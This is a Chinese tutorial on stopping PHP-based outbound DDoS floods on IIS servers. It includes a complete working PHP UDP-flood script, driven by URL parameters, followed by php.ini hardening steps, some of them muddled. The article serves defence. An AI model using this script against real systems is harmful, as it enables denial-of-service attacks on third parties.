用PHP代码调用sockets,直接用服务器的网络攻击别的IP,以前我在apache下有碰到这样的问题,今天我们讲讲述一下关于在iis防止php ddos占完网络带宽与服务器资源的处理办法.
php ddos的常见代码如下:
<?php
$packets = 0;
$ip = $_GET['ip'];
$rand = $_GET['port'];
set_time_limit(0);
ignore_user_abort(FALSE);
$exec_time = $_GET['time'];
$time = time();
print "Flooded: $ip on port $rand
";
$max_time = $time + $exec_time;
for ($i = 0; $i < 65535; $i++) {
$out.= "X";
}
while (1) {
$packets++;
if (time() > $max_time) {
break;
}
$fp = fsockopen("udp://$ip", $rand, $errno, $errstr, 5);
if ($fp) {
fwrite($fp, $out);
fclose($fp);
}
}
echo "Packet complete at " . time('h:i:s') . " with $packets (" . round(($packets * 65) / 1024, 2) . " mB) packets averaging " . round($packets / $exec_time, 2) . " packets/s \n";表现特征:一打开IIS,服务器的流出带宽就用光-----就是说服务器不断向别人发包,这个情况和受到DDOS攻击是不同的,DDOS是不断收到大量数据包.
解决办法:在c:windowsphp.ini里设其值为Off,代码如下:
allow_url_fopen = Off
并且,代码如下:
;extension=php_sockets.dll
前面的;号一定要有,意思就是限制用sockets.dll
然后:代码如下:
; ignore_user_abort = On
前面的;号要去掉,然后重启IIS,如果上述方式仍然无效,你可以在IIS中,允许的扩展中,禁止PHP的扩展测试.
注:如果你的服务器不要运行机制php可以关闭,如果需要的话可以把php_sockets.dll 给禁止,还有一种办法就是把udp端口全部封了,只要80等一些重要的端口开放就可以了.
文章网址:
随意转载^^但请附上教程地址。
Usage of items in python
How to light up Douyin close friends moment
How to import data in access
Solution to java success and javac failure
What to do if temporary file rename fails
How to share a printer between two computers
C++ software Chinese change tutorial
What are the five types of aggregate functions?
![[Web front-end] Node.js quick start](https://img.php.cn/upload/course/000/000/067/662b5d34ba7c0227.png)
